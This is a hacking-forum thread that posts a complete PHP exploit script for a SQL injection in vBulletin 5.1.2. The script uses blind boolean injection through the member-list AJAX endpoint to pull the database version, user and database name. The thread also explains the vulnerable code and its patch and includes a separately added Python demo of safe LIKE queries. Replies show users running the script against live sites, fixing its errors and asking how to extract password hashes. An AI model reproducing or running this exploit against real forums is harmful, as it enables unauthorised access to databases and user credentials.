Nytro

[RST] vBulletin 5.1.2 SQL Injection Exploit


Posted (edited)

Some idiots are trying to sell it:

http://1337day.com/exploits/22452

For 2000 $. Gay :))

Here it is. Free. :)

[phpcode]<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
$ch = curl_init($url);


curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));


$output = curl_exec($ch);

if($output == FALSE) print htmlspecialchars(curl_error($ch));


curl_close($ch);
return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}


// Get version


print "\r\nRomanian Security Team - vBulletin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];

$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabase: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n";


?>[/phpcode]

More details:

The query was the following:

SELECT
user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options,
user.posts, user.joindate, user.usertitle,user.reputation,
session.lastactivity AS lastvisit,
IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid
FROM user AS user
LEFT JOIN session AS session ON session.userid = user.userid
WHERE user.username LIKE "D%"
GROUP BY user.userid
ORDER BY user.username ASC
LIMIT 0, 10;

The "D" is the controlled parameter, and the quote (") was NOT escaped.

The query was generated with a function from querydefs.php:

public function fetchMemberList($params, $db, $check_only = false)

The vulnerable code:

    if (!empty($params['startswith']))
    {
        if ($params['startswith'] == '#')
        {
            $where[] = 'user.username REGEXP "^[^a-z].?"';
        }
        else
        {
            $where[] = 'user.username LIKE "' . $params['startswith'] . '%"';
        }
    }

And the patch contains the fix:

    if (!empty($params['startswith']))
    {
        if ($params['startswith'] == '#')
        {
            $where[] = 'user.username REGEXP "^[^a-z].?"';
        }
        else
        {
            $where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"';
        }
    }

So now, the value is escaped and SQL Injection is fixed.

vBulletin team moved really fast in fixing this problem.

More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst

Edited by Nytro
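Added example (not part of the original post and not vBulletin's code): the same "username starts with" lookup from fetchMemberList() built the pre-patch way and a hardened way, run against a constructed in-memory SQLite table. It shows why pasting the prefix into the SQL text lets a quote terminate the literal, and why the fix has to neutralise the LIKE wildcards as well as the quote (the job escape_string_like() does in the vBulletin patch). The hardened version here uses parameter binding plus a LIKE ESCAPE clause rather than vBulletin's escaping helper; table name, column names and sample usernames are all constructed for the demo.

```python
"""Vulnerable vs hardened LIKE-prefix lookup (added example, constructed data)."""
import sqlite3

# Constructed stand-in for the vBulletin `user` table; "100%fan" is there to
# show what a LIKE metacharacter in a username does to each builder.
SAMPLE_USERS = ["Dan", "Dana", "Mihai", "Nytro", "100%fan", "admin"]


def make_db():
    """Create an in-memory table with the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO user (username) VALUES (?)",
                     [(u,) for u in SAMPLE_USERS])
    return conn


def vulnerable_member_list(conn, startswith):
    """Mirrors the pre-patch builder: the prefix is concatenated into the SQL.

    Single quotes are used because SQLite tries double-quoted text as an
    identifier first; MySQL (which vBulletin targets) accepts both as strings.
    """
    sql = ("SELECT username FROM user WHERE username LIKE '"
           + startswith + "%' ORDER BY username")
    return [row[0] for row in conn.execute(sql)]


def escape_like(value, esc="\\"):
    """Escape LIKE metacharacters so the prefix is matched literally.

    Plain string escaping only protects the quote; % and _ would still act as
    wildcards, which is why the patch reaches for a LIKE-aware escaper.
    """
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def hardened_member_list(conn, startswith):
    """Bind the prefix as a parameter; user text can never become SQL syntax."""
    sql = ("SELECT username FROM user WHERE username LIKE ? ESCAPE '\\' "
           "ORDER BY username")
    pattern = escape_like(startswith) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


def compare(startswith):
    """Run both builders on the same input and return their result lists."""
    conn = make_db()
    return {
        "vulnerable": vulnerable_member_list(conn, startswith),
        "hardened": hardened_member_list(conn, startswith),
    }


if __name__ == "__main__":
    for probe in ["D", "' OR 1=1 -- ", "%", "100%"]:
        print(repr(probe), compare(probe))
```

With the legitimate prefix `D` both builders return the same two users. With a quote-terminating input the vulnerable builder returns the whole table (the `-- ` comment swallows the trailing `%'`), while the hardened one returns nothing because no username literally starts with that text. A bare `%` shows the second half of the fix: it is a wildcard in the vulnerable query and a literal character in the hardened one, so `100%` still finds `100%fan` but `%` alone no longer dumps every row.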
Posted

Nope, let them embarrass themselves. :))

As you can see, the exploit is TRIVIAL. And it isn't useful, there are too few forums running vBulletin 5.

I'll bring more details when I get to Bucharest.

Posted
error

Notice: Undefined offset: 1 in /root/script.php on line 90

PHP Notice: Uninitialized string offset: 0 in /root/script.php on line 91

You have to run it from the console.

php script.php http://site.com/forum

Posted
Notice: Undefined offset: 1 in /root/vbexploit.php on line 179

PHP Notice: Uninitialized string offset: 0 in /root/vbexploit.php on line 181

help

SirGod already posted it above.

 php exploitname.php http://www.yourwebsite.com/forum

Posted

Stop trying it on other versions of vBulletin and it will work. The script searches for a specific text, which is not present in all versions.

while(strpos($result, 'No Users Matched Your Query') == false)

Posted (edited)

I tried it on 5.1.2 too, but I get an error:

Notice: Undefined variable: username in /root/nytro.php on line 90
PHP Notice: Undefined variable: username in /root/nytro.php on line 91

Later edit: I think it has to do with the link in which the "injection" is done ...

Edited by nacks
Posted (edited)

Note: danyweb managed to discover it before the lowlifes at 1337gay. And he didn't make it public, didn't try to sell it... :)

Edit: I added details.

Edited by Nytro
Posted

Is there any protection on the password columns?

select salt from user where userid='1' (works)

select password from user where userid='1' (not works)

Thanks for the exploit nice found :))

Posted
root@bt:~/Desktop# php vbnew.php http://forum.vullsite.com/

Romanian Security Team - vBulltin 5.1.2 SQL Injection

Version: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

how fix mr Nytro ?
